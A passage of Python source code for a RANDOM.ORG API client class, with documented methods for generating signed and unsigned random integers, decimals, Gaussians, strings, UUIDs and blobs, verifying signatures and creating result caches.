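    # client's create_*_cache methods described below:
    #
    #     try:
    #         values = cache.get()      # e.g. [4, 17, 3, 28, 9]
    #     except Empty:
    #         pass                      # queue not yet (re)populated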
class RandomOrgClient(object):
"""
RandomOrgClient main class through which API functions are accessed.
This class provides either serialized or unserialized (determined
on class creation) access to both the signed and unsigned methods
of the RANDOM.ORG API. These are threadsafe and implemented as
blocking remote procedure calls.
If requests are to be issued serially a background Thread will
maintain a Queue of requests to process in sequence.
The class also provides access to creation of a convenience class,
RandomOrgCache, for precaching API responses when the request is
known in advance.
This class will only allow the creation of one instance per API
key. If an instance of this class already exists for a given key,
that instance will be returned on init instead of a new instance.
This class obeys most of the guidelines set forth in
https://api.random.org/guidelines
All requests respect the server's advisoryDelay returned in any
responses, or use _DEFAULT_DELAY if no advisoryDelay is returned. If
    the supplied API key has exceeded its daily request allowance,
this implementation will back off until midnight UTC.
Public methods:
Basic methods for generating randomness, see:
https://api.random.org/json-rpc/1/basic
generate_integers -- get a list of random integers.
generate_decimal_fractions -- get a list of random doubles.
generate_gaussians -- get a list of random numbers.
generate_strings -- get a list of random strings.
generate_UUIDs -- get a list of random UUIDs.
generate_blobs -- get a list of random blobs.
Signed methods for generating randomness, see:
https://api.random.org/json-rpc/1/signing
generate_signed_integers -- get a signed response containing a list
of random integers and a signature.
generate_signed_decimal_fractions -- get a signed response
containing a list of random doubles and a signature.
generate_signed_gaussians -- get a signed response containing a
list of random numbers and a signature.
generate_signed_strings -- get a signed response containing a list
of random strings and a signature.
generate_signed_UUIDs -- get a signed response containing a list of
random UUIDs and a signature.
generate_signed_blobs -- get a signed response containing a list of
random blobs and a signature.
Signature verification for signed methods, see:
https://api.random.org/json-rpc/1/signing
verify_signature -- verify a response against its signature.
# Methods used to create a cache for any given randomness request.
create_integer_cache -- get a RandomOrgCache from which to obtain a
list of random integers.
create_decimal_fraction_cache -- get a RandomOrgCache from which to
obtain a list of random doubles.
create_gaussian_cache -- get a RandomOrgCache from which to obtain
a list of random numbers.
create_string_cache -- get a RandomOrgCache from which to obtain a
list of random strings.
create_UUID_cache -- get a RandomOrgCache from which to obtain a
list of random UUIDs.
create_blob_cache -- get a RandomOrgCache from which to obtain a
list of random blobs.
# Methods for accessing server usage statistics
get_requests_left -- get estimated number of remaining API requests.
get_bits_left -- get estimated number of bits left.
"""
# Maintain a dictionary of API keys and their instances.
__key_indexed_instances = {}
def __new__(cls, *args, **kwds):
"""
Instance creation.
        Ensure only one instance of RandomOrgClient exists per API key.
Create a new instance if the supplied key isn't already known,
otherwise return the previously instantiated one.
"""
instance = RandomOrgClient.__key_indexed_instances.get(args[0], None)
if instance is None:
instance = object.__new__(cls)
RandomOrgClient.__key_indexed_instances[args[0]] = instance
return instance
def __init__(self, api_key,
blocking_timeout=24.0*60.0*60.0, http_timeout=120.0, serialized=True):
"""
Constructor.
Initialize class and start serialized request sending Thread
running as a daemon if applicable.
Keyword arguments:
api_key -- API key obtained from the RANDOM.ORG website, see:
https://api.random.org/api-keys
blocking_timeout -- maximum time in seconds and fractions of
seconds to wait before being allowed to send a request.
            Note this is a hint, not a guarantee; the advisory
            delay from the server must always be obeyed. Supply a value
of -1 to allow blocking forever. (default 24.0*60.0*60.0,
i.e., 1 day)
http_timeout -- maximum time in seconds and fractions of
seconds to wait for the server response to a request.
(default 120.0).
serialized -- determines whether or not requests from this
instance will be added to a Queue and issued serially or
sent when received, obeying any advisory delay (default
True).
"""
# __init__ will always be called after __new__, but if an
# instance already exists for the API key we want to bail
# before actually doing anything in init.
if not hasattr(self, '_api_key'):
if serialized:
# set send function
self._send_request = self._send_serialized_request
# set up the serialized request Queue and Thread
self._serialized_queue = Queue()
self._serialized_thread = threading.Thread(target=self._threaded_request_sending)
self._serialized_thread.daemon = True
self._serialized_thread.start()
else:
# set send function
self._send_request = self._send_unserialized_request
self._api_key = api_key
self._blocking_timeout = blocking_timeout
self._http_timeout = http_timeout
# maintain info to obey server advisory delay
self._advisory_delay_lock = threading.Lock()
self._advisory_delay = 0
self._last_response_received_time = 0
# maintain usage statistics from server
self._requests_left = None
self._bits_left = None
# backoff info for when API key is detected as not running -
# probably because key has exceeded its daily usage limit.
# Backoff runs until midnight UTC.
self._backoff = None
self._backoff_error = None
else:
logging.info("Using RandomOrgClient instance already created for key \"" + api_key + "\"")
# Basic methods for generating randomness, see:
# https://api.random.org/json-rpc/1/basic
def generate_integers(self, n, min, max, replacement=True):
"""
Generate random integers.
Request and return a list (size n) of true random integers
within a user-defined range from the server. See:
https://api.random.org/json-rpc/1/basic#generateIntegers
Raises a RandomOrgSendTimeoutError if time spent waiting before
request is sent exceeds this instance's blocking_timeout.
Raises a RandomOrgKeyNotRunningError if this API key is stopped.
Raises a RandomOrgInsufficientRequestsError if this API key's
server requests allowance has been exceeded and the instance is
backing off until midnight UTC.
Raises a RandomOrgInsufficientBitsError if this API key's
server bits allowance has been exceeded.
Raises a ValueError on RANDOM.ORG Errors, error descriptions:
https://api.random.org/json-rpc/1/error-codes
Raises a RuntimeError on JSON-RPC Errors, error descriptions:
https://api.random.org/json-rpc/1/error-codes
Can also raise connection errors as described here:
http://docs.python-requests.org/en/v2.0-0/user/quickstart/#errors-and-exceptions
Keyword arguments:
n -- How many random integers you need. Must be within the
[1,1e4] range.
min -- The lower boundary for the range from which the random
numbers will be picked. Must be within the [-1e9,1e9] range.
max -- The upper boundary for the range from which the random
numbers will be picked. Must be within the [-1e9,1e9] range.
replacement -- Specifies whether the random numbers should be
picked with replacement. If True the resulting numbers may
contain duplicate values, otherwise the numbers will all be
unique (default True).
"""
params = { 'apiKey':self._api_key, 'n':n, 'min':min, 'max':max, 'replacement':replacement }
request = self._generate_request(_INTEGER_METHOD, params)
response = self._send_request(request)
return self._extract_ints(response)
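    # Illustrative call (hypothetical API key; five dice rolls):
    #
    #     roc = RandomOrgClient('YOUR_API_KEY_HERE')
    #     print(roc.generate_integers(5, 1, 6))   # e.g. [2, 6, 6, 1, 4]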
def generate_decimal_fractions(self, n, decimal_places, replacement=True):
"""
Generate random decimal fractions.
Request and return a list (size n) of true random decimal
fractions, from a uniform distribution across the [0,1]
interval with a user-defined number of decimal places from the
server. See:
https://api.random.org/json-rpc/1/basic#generateDecimalFractions
Raises a RandomOrgSendTimeoutError if time spent waiting before
request is sent exceeds this instance's blocking_timeout.
Raises a RandomOrgKeyNotRunningError if this API key is stopped.
Raises a RandomOrgInsufficientRequestsError if this API key's
server requests allowance has been exceeded and the instance is
backing off until midnight UTC.
Raises a RandomOrgInsufficientBitsError if this API key's
server bits allowance has been exceeded.
Raises a ValueError on RANDOM.ORG Errors, error descriptions:
https://api.random.org/json-rpc/1/error-codes
Raises a RuntimeError on JSON-RPC Errors, error descriptions:
https://api.random.org/json-rpc/1/error-codes
Can also raise connection errors as described here:
http://docs.python-requests.org/en/v2.0-0/user/quickstart/#errors-and-exceptions
Keyword arguments:
n -- How many random decimal fractions you need. Must be within
the [1,1e4] range.
decimal_places -- The number of decimal places to use. Must be
within the [1,20] range.
replacement -- Specifies whether the random numbers should be
picked with replacement. If True the resulting numbers may
contain duplicate values, otherwise the numbers will all be
unique (default True).
"""
params = { 'apiKey':self._api_key, 'n':n,
'decimalPlaces':decimal_places, 'replacement':replacement }
request = self._generate_request(_DECIMAL_FRACTION_METHOD, params)
response = self._send_request(request)
return self._extract_doubles(response)
def generate_gaussians(self, n, mean, standard_deviation, significant_digits):
"""
Generate random numbers.
Request and return a list (size n) of true random numbers from
a Gaussian distribution (also known as a normal distribution).
        The method uses a Box-Muller Transform to generate the Gaussian
distribution from uniformly distributed numbers. See:
https://api.random.org/json-rpc/1/basic#generateGaussians
Raises a RandomOrgSendTimeoutError if time spent waiting before
request is sent exceeds this instance's blocking_timeout.
Raises a RandomOrgKeyNotRunningError if this API key is stopped.
Raises a RandomOrgInsufficientRequestsError if this API key's
server requests allowance has been exceeded and the instance is
backing off until midnight UTC.
Raises a RandomOrgInsufficientBitsError if this API key's
server bits allowance has been exceeded.
Raises a ValueError on RANDOM.ORG Errors, error descriptions:
https://api.random.org/json-rpc/1/error-codes
Raises a RuntimeError on JSON-RPC Errors, error descriptions:
https://api.random.org/json-rpc/1/error-codes
Can also raise connection errors as described here:
http://docs.python-requests.org/en/v2.0-0/user/quickstart/#errors-and-exceptions
Keyword arguments:
n -- How many random numbers you need. Must be within the
[1,1e4] range.
mean -- The distribution's mean. Must be within the [-1e6,1e6]
range.
standard_deviation -- The distribution's standard deviation.
Must be within the [-1e6,1e6] range.
significant_digits -- The number of significant digits to use.
Must be within the [2,20] range.
"""
params = { 'apiKey':self._api_key, 'n':n, 'mean':mean,
'standardDeviation':standard_deviation, 'significantDigits':significant_digits }
request = self._generate_request(_GAUSSIAN_METHOD, params)
response = self._send_request(request)
return self._extract_doubles(response)
def generate_strings(self, n, length, characters, replacement=True):
"""
Generate random strings.
Request and return a list (size n) of true random unicode
strings from the server. See:
https://api.random.org/json-rpc/1/basic#generateStrings
Raises a RandomOrgSendTimeoutError if time spent waiting before
request is sent exceeds this instance's blocking_timeout.
Raises a RandomOrgKeyNotRunningError if this API key is stopped.
Raises a RandomOrgInsufficientRequestsError if this API key's
server requests allowance has been exceeded and the instance is
backing off until midnight UTC.
Raises a RandomOrgInsufficientBitsError if this API key's
server bits allowance has been exceeded.
Raises a ValueError on RANDOM.ORG Errors, error descriptions:
https://api.random.org/json-rpc/1/error-codes
Raises a RuntimeError on JSON-RPC Errors, error descriptions:
https://api.random.org/json-rpc/1/error-codes
Can also raise connection errors as described here:
http://docs.python-requests.org/en/v2.0-0/user/quickstart/#errors-and-exceptions
Keyword arguments:
n -- How many random strings you need. Must be within the
[1,1e4] range.
length -- The length of each string. Must be within the [1,20]
range. All strings will be of the same length.
characters -- A string that contains the set of characters that
are allowed to occur in the random strings. The maximum
number of characters is 80.
replacement -- Specifies whether the random strings should be
picked with replacement. If True the resulting list of
strings may contain duplicates, otherwise the strings will
all be unique (default True).
"""
params = { 'apiKey':self._api_key, 'n':n, 'length':length,
'characters':characters, 'replacement':replacement }
request = self._generate_request(_STRING_METHOD, params)
response = self._send_request(request)
return self._extract_strings(response)
def generate_UUIDs(self, n):
"""
Generate random UUIDs.
Request and return a list (size n) of version 4 true random
Universally Unique IDentifiers (UUIDs) in accordance with
section 4.4 of RFC 4122, from the server. See:
https://api.random.org/json-rpc/1/basic#generateUUIDs
Raises a RandomOrgSendTimeoutError if time spent waiting before
request is sent exceeds this instance's blocking_timeout.
Raises a RandomOrgKeyNotRunningError if this API key is stopped.
Raises a RandomOrgInsufficientRequestsError if this API key's
server requests allowance has been exceeded and the instance is
backing off until midnight UTC.
Raises a RandomOrgInsufficientBitsError if this API key's
server bits allowance has been exceeded.
Raises a ValueError on RANDOM.ORG Errors, error descriptions:
https://api.random.org/json-rpc/1/error-codes
Raises a RuntimeError on JSON-RPC Errors, error descriptions:
https://api.random.org/json-rpc/1/error-codes
Can also raise connection errors as described here:
http://docs.python-requests.org/en/v2.0-0/user/quickstart/#errors-and-exceptions
Keyword arguments:
n -- How many random UUIDs you need. Must be within the [1,1e3]
range.
"""
params = { 'apiKey':self._api_key, 'n':n }
request = self._generate_request(_UUID_METHOD, params)
response = self._send_request(request)
return self._extract_UUIDs(response)
def generate_blobs(self, n, size, format=_BLOB_FORMAT_BASE64):
"""
Generate random BLOBs.
Request and return a list (size n) of Binary Large OBjects
(BLOBs) as unicode strings containing true random data from the
server. See:
https://api.random.org/json-rpc/1/basic#generateBlobs
Raises a RandomOrgSendTimeoutError if time spent waiting before
request is sent exceeds this instance's blocking_timeout.
Raises a RandomOrgKeyNotRunningError if this API key is stopped.
Raises a RandomOrgInsufficientRequestsError if this API key's
server requests allowance has been exceeded and the instance is
backing off until midnight UTC.
Raises a RandomOrgInsufficientBitsError if this API key's
server bits allowance has been exceeded.
Raises a ValueError on RANDOM.ORG Errors, error descriptions:
https://api.random.org/json-rpc/1/error-codes
Raises a RuntimeError on JSON-RPC Errors, error descriptions:
https://api.random.org/json-rpc/1/error-codes
Can also raise connection errors as described here:
http://docs.python-requests.org/en/v2.0-0/user/quickstart/#errors-and-exceptions
Keyword arguments:
n -- How many random blobs you need. Must be within the [1,100]
range.
size -- The size of each blob, measured in bits. Must be within
the [1,1048576] range and must be divisible by 8.
format -- Specifies the format in which the blobs will be
returned. Values allowed are _BLOB_FORMAT_BASE64 and
_BLOB_FORMAT_HEX (default _BLOB_FORMAT_BASE64).
"""
params = { 'apiKey':self._api_key, 'n':n, 'size':size, 'format':format }
request = self._generate_request(_BLOB_METHOD, params)
response = self._send_request(request)
return self._extract_blobs(response)
# Signed methods for generating randomness, see:
# https://api.random.org/json-rpc/1/signing
def generate_signed_integers(self, n, min, max, replacement=True):
"""
Generate digitally signed random integers.
Request a list (size n) of true random integers within a
user-defined range from the server. Returns a dictionary object
with the parsed integer list mapped to 'data', the original
response mapped to 'random', and the response's signature
mapped to 'signature'. See:
https://api.random.org/json-rpc/1/signing#generateSignedIntegers
Raises a RandomOrgSendTimeoutError if time spent waiting before
request is sent exceeds this instance's blocking_timeout.
Raises a RandomOrgKeyNotRunningError if this API key is stopped.
Raises a RandomOrgInsufficientRequestsError if this API key's
server requests allowance has been exceeded and the instance is
backing off until midnight UTC.
Raises a RandomOrgInsufficientBitsError if this API key's
server bits allowance has been exceeded.
Raises a ValueError on RANDOM.ORG Errors, error descriptions:
https://api.random.org/json-rpc/1/error-codes
Raises a RuntimeError on JSON-RPC Errors, error descriptions:
https://api.random.org/json-rpc/1/error-codes
Can also raise connection errors as described here:
http://docs.python-requests.org/en/v2.0-0/user/quickstart/#errors-and-exceptions
Keyword arguments:
n -- How many random integers you need. Must be within the
[1,1e4] range.
min -- The lower boundary for the range from which the random
numbers will be picked. Must be within the [-1e9,1e9] range.
max -- The upper boundary for the range from which the random
numbers will be picked. Must be within the [-1e9,1e9] range.
replacement -- Specifies whether the random numbers should be
picked with replacement. If True the resulting numbers may
contain duplicate values, otherwise the numbers will all be
unique (default True).
"""
params = { 'apiKey':self._api_key, 'n':n, 'min':min, 'max':max, 'replacement':replacement }
request = self._generate_request(_SIGNED_INTEGER_METHOD, params)
response = self._send_request(request)
return self._extract_signed_response(response, self._extract_ints)
def generate_signed_decimal_fractions(self, n, decimal_places, replacement=True):
"""
Generate digitally signed random decimal fractions.
Request a list (size n) of true random decimal fractions, from
a uniform distribution across the [0,1] interval with a
user-defined number of decimal places from the server. Returns
a dictionary object with the parsed decimal fraction list
mapped to 'data', the original response mapped to 'random', and
the response's signature mapped to 'signature'. See:
https://api.random.org/json-rpc/1/signing#generateSignedDecimalFractions
Raises a RandomOrgSendTimeoutError if time spent waiting before
request is sent exceeds this instance's blocking_timeout.
Raises a RandomOrgKeyNotRunningError if this API key is stopped.
Raises a RandomOrgInsufficientRequestsError if this API key's
server requests allowance has been exceeded and the instance is
backing off until midnight UTC.
Raises a RandomOrgInsufficientBitsError if this API key's
server bits allowance has been exceeded.
Raises a ValueError on RANDOM.ORG Errors, error descriptions:
https://api.random.org/json-rpc/1/error-codes
Raises a RuntimeError on JSON-RPC Errors, error descriptions:
https://api.random.org/json-rpc/1/error-codes
Can also raise connection errors as described here:
http://docs.python-requests.org/en/v2.0-0/user/quickstart/#errors-and-exceptions
Keyword arguments:
n -- How many random decimal fractions you need. Must be within
the [1,1e4] range.
decimal_places -- The number of decimal places to use. Must be
within the [1,20] range.
replacement -- Specifies whether the random numbers should be
picked with replacement. If True the resulting numbers may
contain duplicate values, otherwise the numbers will all be
unique (default True).
"""
params = { 'apiKey':self._api_key, 'n':n,
'decimalPlaces':decimal_places, 'replacement':replacement }
request = self._generate_request(_SIGNED_DECIMAL_FRACTION_METHOD, params)
response = self._send_request(request)
return self._extract_signed_response(response, self._extract_doubles)
def generate_signed_gaussians(self, n, mean, standard_deviation, significant_digits):
"""
Generate digitally signed random numbers.
Request a list (size n) of true random numbers from a Gaussian
        distribution (also known as a normal distribution). The numbers
        are generated via a Box-Muller Transform applied to uniformly
        distributed numbers. Returns a
dictionary object with the parsed random number list mapped to
'data', the original response mapped to 'random', and the
response's signature mapped to 'signature'. See:
https://api.random.org/json-rpc/1/signing#generateSignedGaussians
Raises a RandomOrgSendTimeoutError if time spent waiting before
request is sent exceeds this instance's blocking_timeout.
Raises a RandomOrgKeyNotRunningError if this API key is stopped.
Raises a RandomOrgInsufficientRequestsError if this API key's
server requests allowance has been exceeded and the instance is
backing off until midnight UTC.
Raises a RandomOrgInsufficientBitsError if this API key's
server bits allowance has been exceeded.
Raises a ValueError on RANDOM.ORG Errors, error descriptions:
https://api.random.org/json-rpc/1/error-codes
Raises a RuntimeError on JSON-RPC Errors, error descriptions:
https://api.random.org/json-rpc/1/error-codes
Can also raise connection errors as described here:
http://docs.python-requests.org/en/v2.0-0/user/quickstart/#errors-and-exceptions
Keyword arguments:
n -- How many random numbers you need. Must be within the
[1,1e4] range.
mean -- The distribution's mean. Must be within the [-1e6,1e6]
range.
standard_deviation -- The distribution's standard deviation.
Must be within the [-1e6,1e6] range.
significant_digits -- The number of significant digits to use.
Must be within the [2,20] range.
"""
params = { 'apiKey':self._api_key, 'n':n, 'mean':mean,
'standardDeviation':standard_deviation, 'significantDigits':significant_digits }
request = self._generate_request(_SIGNED_GAUSSIAN_METHOD, params)
response = self._send_request(request)
return self._extract_signed_response(response, self._extract_doubles)
def generate_signed_strings(self, n, length, characters, replacement=True):
"""
Generate digitally signed random strings.
Request a list (size n) of true random strings from the server.
Returns a dictionary object with the parsed random string list
mapped to 'data', the original response mapped to 'random', and
the response's signature mapped to 'signature'. See:
https://api.random.org/json-rpc/1/signing#generateSignedStrings
Raises a RandomOrgSendTimeoutError if time spent waiting before
request is sent exceeds this instance's blocking_timeout.
Raises a RandomOrgKeyNotRunningError if this API key is stopped.
Raises a RandomOrgInsufficientRequestsError if this API key's
server requests allowance has been exceeded and the instance is
backing off until midnight UTC.
Raises a RandomOrgInsufficientBitsError if this API key's
server bits allowance has been exceeded.
Raises a ValueError on RANDOM.ORG Errors, error descriptions:
https://api.random.org/json-rpc/1/error-codes
Raises a RuntimeError on JSON-RPC Errors, error descriptions:
https://api.random.org/json-rpc/1/error-codes
Can also raise connection errors as described here:
http://docs.python-requests.org/en/v2.0-0/user/quickstart/#errors-and-exceptions
Keyword arguments:
n -- How many random strings you need. Must be within the
[1,1e4] range.
length -- The length of each string. Must be within the [1,20]
range. All strings will be of the same length.
characters -- A string that contains the set of characters that
are allowed to occur in the random strings. The maximum
number of characters is 80.
replacement -- Specifies whether the random strings should be
picked with replacement. If True the resulting list of
strings may contain duplicates, otherwise the strings will
all be unique (default True).
"""
params = { 'apiKey':self._api_key, 'n':n, 'length':length,
'characters':characters, 'replacement':replacement }
request = self._generate_request(_SIGNED_STRING_METHOD, params)
response = self._send_request(request)
return self._extract_signed_response(response, self._extract_strings)
def generate_signed_UUIDs(self, n):
"""
Generate digitally signed random UUIDs.
Request a list (size n) of version 4 true random Universally
Unique IDentifiers (UUIDs) in accordance with section 4.4 of
RFC 4122, from the server. Returns a dictionary object with the
parsed random UUID list mapped to 'data', the original response
mapped to 'random', and the response's signature mapped to
'signature'. See:
https://api.random.org/json-rpc/1/signing#generateSignedUUIDs
Raises a RandomOrgSendTimeoutError if time spent waiting before
request is sent exceeds this instance's blocking_timeout.
Raises a RandomOrgKeyNotRunningError if this API key is stopped.
Raises a RandomOrgInsufficientRequestsError if this API key's
server requests allowance has been exceeded and the instance is
backing off until midnight UTC.
Raises a RandomOrgInsufficientBitsError if this API key's
server bits allowance has been exceeded.
Raises a ValueError on RANDOM.ORG Errors, error descriptions:
https://api.random.org/json-rpc/1/error-codes
Raises a RuntimeError on JSON-RPC Errors, error descriptions:
https://api.random.org/json-rpc/1/error-codes
Can also raise connection errors as described here:
http://docs.python-requests.org/en/v2.0-0/user/quickstart/#errors-and-exceptions
Keyword arguments:
n -- How many random UUIDs you need. Must be within the [1,1e3]
range.
"""
params = { 'apiKey':self._api_key, 'n':n }
request = self._generate_request(_SIGNED_UUID_METHOD, params)
response = self._send_request(request)
return self._extract_signed_response(response, self._extract_UUIDs)
def generate_signed_blobs(self, n, size, format=_BLOB_FORMAT_BASE64):
"""
Generate digitally signed random BLOBs.
Request a list (size n) of Binary Large OBjects (BLOBs)
containing true random data from the server. Returns a
dictionary object with the parsed random BLOB list mapped to
'data', the original response mapped to 'random', and the
response's signature mapped to 'signature'. See:
https://api.random.org/json-rpc/1/signing#generateSignedBlobs
Raises a RandomOrgSendTimeoutError if time spent waiting before
request is sent exceeds this instance's blocking_timeout.
Raises a RandomOrgKeyNotRunningError if this API key is stopped.
Raises a RandomOrgInsufficientRequestsError if this API key's
server requests allowance has been exceeded and the instance is
backing off until midnight UTC.
Raises a RandomOrgInsufficientBitsError if this API key's
server bits allowance has been exceeded.
Raises a ValueError on RANDOM.ORG Errors, error descriptions:
https://api.random.org/json-rpc/1/error-codes
Raises a RuntimeError on JSON-RPC Errors, error descriptions:
https://api.random.org/json-rpc/1/error-codes
Can also raise connection errors as described here:
http://docs.python-requests.org/en/v2.0-0/user/quickstart/#errors-and-exceptions
Keyword arguments:
n -- How many random blobs you need. Must be within the [1,100]
range.
size -- The size of each blob, measured in bits. Must be within
the [1,1048576] range and must be divisible by 8.
format -- Specifies the format in which the blobs will be
returned. Values allowed are _BLOB_FORMAT_BASE64 and
_BLOB_FORMAT_HEX (default _BLOB_FORMAT_BASE64).
"""
params = { 'apiKey':self._api_key, 'n':n, 'size':size, 'format':format }
request = self._generate_request(_SIGNED_BLOB_METHOD, params)
response = self._send_request(request)
return self._extract_signed_response(response, self._extract_blobs)
# Signature verification for signed methods, see:
# https://api.random.org/json-rpc/1/signing
def verify_signature(self, random, signature):
"""
Verify the signature of a previously received response.
Verify the signature of a response previously received from one
of the methods in the Signed API with the server. This is used
to examine the authenticity of numbers. Return True on
verification success. See:
https://api.random.org/json-rpc/1/signing#verifySignature
Raises a RandomOrgSendTimeoutError if time spent waiting before
request is sent exceeds this instance's blocking_timeout.
Raises a RandomOrgKeyNotRunningError if this API key is stopped.
Raises a RandomOrgInsufficientRequestsError if this API key's
server requests allowance has been exceeded and the instance is
backing off until midnight UTC.
Raises a RandomOrgInsufficientBitsError if this API key's
server bits allowance has been exceeded.
Raises a ValueError on RANDOM.ORG Errors, error descriptions:
https://api.random.org/json-rpc/1/error-codes
Raises a RuntimeError on JSON-RPC Errors, error descriptions:
https://api.random.org/json-rpc/1/error-codes
Can also raise connection errors as described here:
http://docs.python-requests.org/en/v2.0-0/user/quickstart/#errors-and-exceptions
Keyword arguments:
random -- The random field from a response returned by
RANDOM.ORG through one of the Signed API methods.
signature -- The signature field from the same response that
the random field originates from.
"""
params = { 'random':random, 'signature':signature }
request = self._generate_request(_VERIFY_SIGNATURE_METHOD, params)
response = self._send_request(request)
return self._extract_verification_response(response)
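    # Illustrative sketch (not part of the library): generating signed
    # integers and then checking the response with verify_signature() above.
    # The client instance name is an assumption.
    #
    #   signed = client.generate_signed_integers(5, 1, 6)
    #   # signed == {'data': [...], 'random': {...}, 'signature': '...'}
    #   assert client.verify_signature(signed['random'], signed['signature'])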
# Methods used to create a cache for any given randomness request.
def create_integer_cache(self, n, min, max, replacement=True, cache_size=20):
"""
Get a RandomOrgCache to obtain random integers.
The RandomOrgCache can be polled for new results conforming to
the output format of the input request. See output of
generate_integers() for the return value of a poll on
RandomOrgCache.
Keyword arguments:
n -- How many random integers you need. Must be within the
[1,1e4] range.
min -- The lower boundary for the range from which the random
numbers will be picked. Must be within the [-1e9,1e9] range.
max -- The upper boundary for the range from which the random
numbers will be picked. Must be within the [-1e9,1e9] range.
replacement -- Specifies whether the random numbers should be
picked with replacement. If True the resulting numbers may
contain duplicate values, otherwise the numbers will all be
unique (default True).
cache_size -- Number of result-sets for the cache to try to
maintain at any given time (default 20, minimum 2).
"""
if cache_size < 2:
cache_size = 2
# if possible, make requests more efficient by bulk-ordering
# from the server. Either 5 sets of items at a time, or
# cache_size/2 if 5 >= cache_size.
if replacement:
            bulk_n = cache_size//2 if 5 >= cache_size else 5  # floor division keeps the bulk size an int
params = { 'apiKey':self._api_key, 'n':bulk_n*n,
'min':min, 'max':max, 'replacement':replacement }
# not possible to make the request more efficient
else:
bulk_n = 0
params = { 'apiKey':self._api_key, 'n':n,
'min':min, 'max':max, 'replacement':replacement }
# get the request object for use in all requests from this cache
request = self._generate_request(_INTEGER_METHOD, params)
return RandomOrgCache(self._send_request, self._extract_ints,
request, cache_size, bulk_n, n)
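    # Illustrative sketch (not part of the library): polling a cache created
    # by create_integer_cache() above. It assumes RandomOrgCache exposes a
    # non-blocking get() that raises queue.Empty while no result set is ready.
    #
    #   import queue
    #   cache = client.create_integer_cache(5, 0, 10)
    #   try:
    #       values = cache.get()
    #   except queue.Empty:
    #       values = None   # cache is still filling; poll again later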
def create_decimal_fraction_cache(self, n, decimal_places, replacement=True, cache_size=20):
"""
Get a RandomOrgCache to obtain random decimal fractions.
The RandomOrgCache can be polled for new results conforming to
the output format of the input request. See output of
generate_decimal_fractions() for the return value of a poll on
RandomOrgCache.
Keyword arguments:
n -- How many random decimal fractions you need. Must be within
the [1,1e4] range.
decimal_places -- The number of decimal places to use. Must be
within the [1,20] range.
replacement -- Specifies whether the random numbers should be
picked with replacement. If True the resulting numbers may
contain duplicate values, otherwise the numbers will all be
unique (default True).
cache_size -- Number of result-sets for the cache to try to
maintain at any given time (default 20, minimum 2).
"""
if cache_size < 2:
cache_size = 2
# if possible, make requests more efficient by bulk-ordering
# from the server. Either 5 sets of items at a time, or
# cache_size/2 if 5 >= cache_size.
if replacement:
            bulk_n = cache_size//2 if 5 >= cache_size else 5
params = { 'apiKey':self._api_key, 'n':bulk_n*n,
'decimalPlaces':decimal_places, 'replacement':replacement }
# not possible to make the request more efficient
else:
bulk_n = 0
params = { 'apiKey':self._api_key, 'n':n,
'decimalPlaces':decimal_places, 'replacement':replacement }
# get the request object for use in all requests from this cache
request = self._generate_request(_DECIMAL_FRACTION_METHOD, params)
return RandomOrgCache(self._send_request, self._extract_doubles,
request, cache_size, bulk_n, n)
def create_gaussian_cache(self, n, mean, standard_deviation, significant_digits, cache_size=20):
"""
Get a RandomOrgCache to obtain random numbers.
The RandomOrgCache can be polled for new results conforming to
the output format of the input request. See output of
generate_gaussians() for the return value of a poll on
RandomOrgCache.
Keyword arguments:
n -- How many random numbers you need. Must be within the
[1,1e4] range.
mean -- The distribution's mean. Must be within the [-1e6,1e6]
range.
standard_deviation -- The distribution's standard deviation.
Must be within the [-1e6,1e6] range.
significant_digits -- The number of significant digits to use.
Must be within the [2,20] range.
cache_size -- Number of result-sets for the cache to try to
maintain at any given time (default 20, minimum 2).
"""
if cache_size < 2:
cache_size = 2
# make requests more efficient by bulk-ordering from the
# server. Either 5 sets of items at a time, or cache_size/2
# if 5 >= cache_size.
        bulk_n = cache_size//2 if 5 >= cache_size else 5
params = { 'apiKey':self._api_key, 'n':bulk_n*n, 'mean':mean,
'standardDeviation':standard_deviation, 'significantDigits':significant_digits }
# get the request object for use in all requests from this cache
request = self._generate_request(_GAUSSIAN_METHOD, params)
return RandomOrgCache(self._send_request, self._extract_doubles,
request, cache_size, bulk_n, n)
def create_string_cache(self, n, length, characters, replacement=True, cache_size=20):
"""
Get a RandomOrgCache to obtain random strings.
The RandomOrgCache can be polled for new results conforming to
the output format of the input request. See output of
generate_strings() for the return value of a poll on
RandomOrgCache.
Keyword arguments:
n -- How many random strings you need. Must be within the
[1,1e4] range.
length -- The length of each string. Must be within the [1,20]
range. All strings will be of the same length.
characters -- A string that contains the set of characters that
are allowed to occur in the random strings. The maximum
number of characters is 80.
replacement -- Specifies whether the random strings should be
picked with replacement. If True the resulting list of
strings may contain duplicates, otherwise the strings will
all be unique (default True).
cache_size -- Number of result-sets for the cache to try to
maintain at any given time (default 20, minimum 2).
"""
if cache_size < 2:
cache_size = 2
# if possible, make requests more efficient by bulk-ordering
# from the server. Either 5 sets of items at a time, or
# cache_size/2 if 5 >= cache_size.
if replacement:
            bulk_n = cache_size//2 if 5 >= cache_size else 5
params = { 'apiKey':self._api_key, 'n':bulk_n*n, 'length':length,
'characters':characters, 'replacement':replacement }
# not possible to make the request more efficient
else:
bulk_n = 0
params = { 'apiKey':self._api_key, 'n':n, 'length':length,
'characters':characters, 'replacement':replacement }
# get the request object for use in all requests from this cache
request = self._generate_request(_STRING_METHOD, params)
return RandomOrgCache(self._send_request, self._extract_strings,
request, cache_size, bulk_n, n)
def create_UUID_cache(self, n, cache_size=10):
"""
Get a RandomOrgCache to obtain random UUIDs.
The RandomOrgCache can be polled for new results conforming to
the output format of the input request. See output of
generate_UUIDs() for the return value of a poll on
RandomOrgCache.
Keyword arguments:
n -- How many random UUIDs you need. Must be within the [1,1e3]
range.
cache_size -- Number of result-sets for the cache to try to
maintain at any given time (default 10, minimum 2).
"""
if cache_size < 2:
cache_size = 2
# make requests more efficient by bulk-ordering
# from the server. Either 5 sets of items at a time, or
# cache_size/2 if 5 >= cache_size.
        bulk_n = cache_size//2 if 5 >= cache_size else 5
params = { 'apiKey':self._api_key, 'n':bulk_n*n }
# get the request object for use in all requests from this cache
request = self._generate_request(_UUID_METHOD, params)
return RandomOrgCache(self._send_request, self._extract_UUIDs,
request, cache_size, bulk_n, n)
def create_blob_cache(self, n, size, format=_BLOB_FORMAT_BASE64, cache_size=10):
"""
Get a RandomOrgCache to obtain random blobs.
The RandomOrgCache can be polled for new results conforming to
the output format of the input request. See output of
generate_blobs() for the return value of a poll on
RandomOrgCache.
Keyword arguments:
n -- How many random blobs you need. Must be within the [1,100]
range.
size -- The size of each blob, measured in bits. Must be within
the [1,1048576] range and must be divisible by 8.
format -- Specifies the format in which the blobs will be
